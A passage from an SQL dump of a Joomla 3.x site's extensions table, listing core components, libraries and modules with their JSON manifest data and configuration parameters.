Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(7,0,'com_checkin','component','com_checkin','',1,1,1,1,'{\"name\":\"com_checkin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CHECKIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(8,0,'com_contact','component','com_contact','',1,1,1,0,'{\"name\":\"com_contact\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','{\"show_contact_category\":\"hide\",\"show_contact_list\":\"0\",\"presentation_style\":\"sliders\",\"show_name\":\"1\",\"show_position\":\"1\",\"show_email\":\"0\",\"show_street_address\":\"1\",\"show_suburb\":\"1\",\"show_state\":\"1\",\"show_postcode\":\"1\",\"show_country\":\"1\",\"show_telephone\":\"1\",\"show_mobile\":\"1\",\"show_fax\":\"1\",\"show_webpage\":\"1\",\"show_misc\":\"1\",\"show_image\":\"1\",\"image\":\"\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"contact_icons\":\"0\",\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"show_headings\":\"1\",\"show_position_headings\":\"1\",\"show_email_headings\":\"0\",\"show_telephone_headings\":\"1\",\"show_mobile_headings\":\"0\",\"show_fax_headings\":\"0\",\"allow_vcard_headings\":\"0\",\"show_suburb_headings\":\"1\",\"show_state_headings\":\"1\",\"show_country_headings\":\"1\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"0\",\"redirect\":\"\",\"show_category_crumb\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(9,0,'com_cpanel','component','com_cpanel','',1,1,1,1,'{\"name\":\"com_cpanel\",\"type\":\"component\",\"creationDate\":\"Jun 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CPANEL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10,0,'com_installer','component','com_installer','',1,1,1,1,'{\"name\":\"com_installer\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_INSTALLER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(11,0,'com_languages','component','com_languages','',1,1,1,1,'{\"name\":\"com_languages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','{\"administrator\":\"ru-RU\",\"site\":\"en-GB\"}','','',0,'0000-00-00 00:00:00',0,0),(12,0,'com_login','component','com_login','',1,1,1,1,'{\"name\":\"com_login\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(13,0,'com_media','component','com_media','',1,1,0,1,'{\"name\":\"com_media\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MEDIA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"media\"}','{\"upload_extensions\":\"bmp,csv,doc,gif,ico,jpg,jpeg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,GIF,ICO,JPG,JPEG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\",\"upload_maxsize\":\"10\",\"file_path\":\"images\",\"image_path\":\"images\",\"restrict_uploads\":\"1\",\"allowed_media_usergroup\":\"3\",\"check_mime\":\"1\",\"image_extensions\":\"bmp,gif,jpg,png\",\"ignore_extensions\":\"\",\"upload_mime\":\"image\\/jpeg,image\\/gif,image\\/png,image\\/bmp,application\\/x-shockwave-flash,application\\/msword,application\\/excel,application\\/pdf,application\\/powerpoint,text\\/plain,application\\/x-zip\",\"upload_mime_illegal\":\"text\\/html\",\"enable_flash\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(14,0,'com_menus','component','com_menus','',1,1,1,1,'{\"name\":\"com_menus\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MENUS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(15,0,'com_messages','component','com_messages','',1,1,1,1,'{\"name\":\"com_messages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MESSAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(16,0,'com_modules','component','com_modules','',1,1,1,1,'{\"name\":\"com_modules\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MODULES_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(17,0,'com_newsfeeds','component','com_newsfeeds','',1,1,1,0,'{\"name\":\"com_newsfeeds\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{\"show_feed_image\":\"1\",\"show_feed_description\":\"1\",\"show_item_description\":\"1\",\"feed_word_count\":\"0\",\"show_headings\":\"1\",\"show_name\":\"1\",\"show_articles\":\"0\",\"show_link\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"display_num\":\"\",\"show_pagination_limit\":\"1\",\"show_pagination\":\"1\",\"show_pagination_results\":\"1\",\"show_cat_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(18,0,'com_plugins','component','com_plugins','',1,1,1,1,'{\"name\":\"com_plugins\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_PLUGINS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(19,0,'com_search','component','com_search','',1,1,1,0,'{\"name\":\"com_search\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_SEARCH_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"search\"}','{\"enabled\":\"0\",\"show_date\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(20,0,'com_templates','component','com_templates','',1,1,1,1,'{\"name\":\"com_templates\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_TEMPLATES_XML_DESCRIPTION\",\"group\":\"\"}','{\"template_positions_display\":\"1\",\"upload_limit\":\"2\",\"image_formats\":\"gif,bmp,jpg,jpeg,png\",\"source_formats\":\"txt,less,ini,xml,js,php,css\",\"font_formats\":\"woff,ttf,otf\",\"compressed_formats\":\"zip\"}','','',0,'0000-00-00 00:00:00',0,0),(21,801,'com_weblinks','component','com_weblinks','',1,1,1,0,'{\"name\":\"com_weblinks\",\"type\":\"component\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"COM_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"weblinks\"}','{\"show_comp_description\":\"1\",\"comp_description\":\"\",\"show_link_hits\":\"1\",\"show_link_description\":\"1\",\"show_other_cats\":\"0\",\"show_headings\":\"0\",\"show_numbers\":\"0\",\"show_report\":\"1\",\"count_clicks\":\"1\",\"target\":\"0\",\"link_icons\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(22,0,'com_content','component','com_content','',1,1,0,1,'{\"name\":\"com_content\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{\"article_layout\":\"_:default\",\"show_title\":\"0\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_readmore\":\"0\",\"show_readmore_title\":\"0\",\"readmore_limit\":\"100\",\"show_tags\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"0\",\"show_publishing_options\":\"1\",\"show_article_options\":\"1\",\"save_history\":\"0\",\"history_limit\":10,\"show_urls_images_frontend\":\"0\",\"show_urls_images_backend\":\"0\",\"targeta\":0,\"targetb\":0,\"targetc\":0,\"float_intro\":\"right\",\"float_fulltext\":\"right\",\"category_layout\":\"_:blog\",\"show_category_heading_title_text\":\"0\",\"show_category_title\":\"0\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"0\",\"show_no_articles\":\"1\",\"show_subcat_desc\":\"1\",\"show_cat_num_articles\":\"1\",\"show_cat_tags\":\"1\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_num_articles_cat\":\"1\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"0\",\"show_subcategory_content\":\"0\",\"show_pagination_limit\":\"1\",\"filter_field\":\"hide\",\"show_headings\":\"1\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"1\",\"list_show_author\":\"1\",\"orderby_pri\":\"none\",\"orderby_sec\":\"rdate\",\"order_date\":\"published\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"show_featured\":\"show\",\"show_feed_link\":\"1\",\"feed_summary\":\"0\",\"feed_show_readmore\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(23,0,'com_config','component','com_config','',1,1,0,1,'{\"name\":\"com_config\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONFIG_XML_DESCRIPTION\",\"group\":\"\"}','{\"filters\":{\"1\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"6\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"7\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"2\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"3\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"4\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"5\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"8\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"}}}','','',0,'0000-00-00 00:00:00',0,0),(24,0,'com_redirect','component','com_redirect','',1,1,0,1,'{\"name\":\"com_redirect\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(25,0,'com_users','component','com_users','',1,1,0,1,'{\"name\":\"com_users\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_USERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"users\"}','{\"allowUserRegistration\":\"0\",\"new_usertype\":\"2\",\"guest_usergroup\":\"1\",\"sendpassword\":\"1\",\"useractivation\":\"1\",\"mail_to_admin\":\"1\",\"captcha\":\"\",\"frontend_userparams\":\"1\",\"site_language\":\"0\",\"change_login_name\":\"0\",\"domains\":\"\",\"reset_count\":\"10\",\"reset_time\":\"1\",\"minimum_length\":\"4\",\"minimum_integers\":\"0\",\"minimum_symbols\":\"0\",\"minimum_uppercase\":\"0\",\"save_history\":\"0\",\"history_limit\":5,\"mailSubjectPrefix\":\"\",\"mailBodySuffix\":\"\",\"debugUsers\":\"1\",\"debugGroups\":\"1\",\"sef_advanced\":0,\"custom_fields_enable\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(27,0,'com_finder','component','com_finder','',1,1,0,0,'{\"name\":\"com_finder\",\"type\":\"component\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"finder\"}','{\"show_description\":\"1\",\"description_length\":255,\"allow_empty_query\":\"0\",\"show_url\":\"1\",\"show_advanced\":\"1\",\"expand_advanced\":\"0\",\"show_date_filters\":\"0\",\"highlight_terms\":\"1\",\"opensearch_name\":\"\",\"opensearch_description\":\"\",\"batch_size\":\"50\",\"memory_table_limit\":30000,\"title_multiplier\":\"1.7\",\"text_multiplier\":\"0.7\",\"meta_multiplier\":\"1.2\",\"path_multiplier\":\"2.0\",\"misc_multiplier\":\"0.3\",\"stemmer\":\"snowball\"}','','',0,'0000-00-00 00:00:00',0,0),(28,0,'com_joomlaupdate','component','com_joomlaupdate','',1,1,0,1,'{\"name\":\"com_joomlaupdate\",\"type\":\"component\",\"creationDate\":\"February 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2012 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.10.1\",\"description\":\"COM_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','{\"updatesource\":\"sts\",\"customurl\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(29,0,'com_tags','component','com_tags','',1,1,1,1,'{\"name\":\"com_tags\",\"type\":\"component\",\"creationDate\":\"December 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"COM_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(30,0,'com_contenthistory','component','com_contenthistory','',1,1,1,0,'{\"name\":\"com_contenthistory\",\"type\":\"component\",\"creationDate\":\"May 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_CONTENTHISTORY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contenthistory\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(31,0,'com_ajax','component','com_ajax','',1,1,1,1,'{\"name\":\"com_ajax\",\"type\":\"component\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_AJAX_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"ajax\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(32,0,'com_postinstall','component','com_postinstall','',1,1,1,1,'{\"name\":\"com_postinstall\",\"type\":\"component\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_POSTINSTALL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(33,0,'com_fields','component','com_fields','',1,1,1,0,'{\"name\":\"com_fields\",\"type\":\"component\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"COM_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','','','',0,'0000-00-00 00:00:00',0,0),(34,0,'com_associations','component','com_associations','',1,1,1,0,'{\"name\":\"com_associations\",\"type\":\"component\",\"creationDate\":\"January 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2017 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"COM_ASSOCIATIONS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(35,0,'com_privacy','component','com_privacy','',1,1,1,1,'{\"name\":\"com_privacy\",\"type\":\"component\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"COM_PRIVACY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacy\"}','','','',0,'0000-00-00 00:00:00',0,0),(36,0,'com_actionlogs','component','com_actionlogs','',1,1,1,1,'{\"name\":\"com_actionlogs\",\"type\":\"component\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"COM_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\"}','{\"ip_logging\":0,\"csv_delimiter\":\",\",\"loggable_extensions\":[\"com_banners\",\"com_cache\",\"com_categories\",\"com_checkin\",\"com_config\",\"com_contact\",\"com_content\",\"com_installer\",\"com_media\",\"com_menus\",\"com_messages\",\"com_modules\",\"com_newsfeeds\",\"com_plugins\",\"com_redirect\",\"com_tags\",\"com_templates\",\"com_users\"]}','','',0,'0000-00-00 00:00:00',0,0),(102,0,'LIB_PHPUTF8','library','phputf8','',0,1,1,1,'{\"name\":\"LIB_PHPUTF8\",\"type\":\"library\",\"creationDate\":\"2006\",\"author\":\"Harry Fuecks\",\"copyright\":\"Copyright various authors\",\"authorEmail\":\"hfuecks@gmail.com\",\"authorUrl\":\"http:\\/\\/sourceforge.net\\/projects\\/phputf8\",\"version\":\"0.5\",\"description\":\"LIB_PHPUTF8_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phputf8\"}','','','',0,'0000-00-00 00:00:00',0,0),(103,0,'LIB_JOOMLA','library','joomla','',0,1,1,1,'{\"name\":\"LIB_JOOMLA\",\"type\":\"library\",\"creationDate\":\"2008\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2008 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"https:\\/\\/www.joomla.org\",\"version\":\"13.1\",\"description\":\"LIB_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{\"mediaversion\":\"87040edc2eec8d1a808d6279dc224aeb\"}','','',0,'0000-00-00 00:00:00',0,0),(104,0,'LIB_IDNA','library','idna_convert','',0,1,1,1,'{\"name\":\"LIB_IDNA\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"phlyLabs\",\"copyright\":\"2004-2011 phlyLabs Berlin, http:\\/\\/phlylabs.de\",\"authorEmail\":\"phlymail@phlylabs.de\",\"authorUrl\":\"http:\\/\\/phlylabs.de\",\"version\":\"0.8.0\",\"description\":\"LIB_IDNA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"idna_convert\"}','','','',0,'0000-00-00 00:00:00',0,0),(105,0,'FOF','library','fof','',0,1,1,1,'{\"name\":\"FOF\",\"type\":\"library\",\"creationDate\":\"2015-04-22 13:15:32\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2015 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.4.3\",\"description\":\"LIB_FOF_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fof\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(106,0,'LIB_PHPASS','library','phpass','',0,1,1,1,'{\"name\":\"LIB_PHPASS\",\"type\":\"library\",\"creationDate\":\"2004-2006\",\"author\":\"Solar Designer\",\"copyright\":\"\",\"authorEmail\":\"solar@openwall.com\",\"authorUrl\":\"http:\\/\\/www.openwall.com\\/phpass\\/\",\"version\":\"0.3\",\"description\":\"LIB_PHPASS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phpass\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(200,0,'mod_articles_archive','module','mod_articles_archive','',0,1,1,0,'{\"name\":\"mod_articles_archive\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_archive\"}','','','',0,'0000-00-00 00:00:00',0,0),(201,0,'mod_articles_latest','module','mod_articles_latest','',0,1,1,0,'{\"name\":\"mod_articles_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_NEWS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(202,0,'mod_articles_popular','module','mod_articles_popular','',0,1,1,0,'{\"name\":\"mod_articles_popular\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_popular\"}','','','',0,'0000-00-00 00:00:00',0,0),(203,0,'mod_banners','module','mod_banners','',0,1,1,0,'{\"name\":\"mod_banners\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BANNERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_banners\"}','','','',0,'0000-00-00 00:00:00',0,0),(204,0,'mod_breadcrumbs','module','mod_breadcrumbs','',0,1,1,1,'{\"name\":\"mod_breadcrumbs\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BREADCRUMBS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_breadcrumbs\"}','','','',0,'0000-00-00 00:00:00',0,0),(205,0,'mod_custom','module','mod_custom','',0,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_custom\"}','','','',0,'0000-00-00 00:00:00',0,0),(206,0,'mod_feed','module','mod_feed','',0,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_feed\"}','','','',0,'0000-00-00 00:00:00',0,0),(207,0,'mod_footer','module','mod_footer','',0,1,1,0,'{\"name\":\"mod_footer\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FOOTER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_footer\"}','','','',0,'0000-00-00 00:00:00',0,0),(208,0,'mod_login','module','mod_login','',0,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_login\"}','','','',0,'0000-00-00 00:00:00',0,0),(209,0,'mod_menu','module','mod_menu','',0,1,1,1,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"July 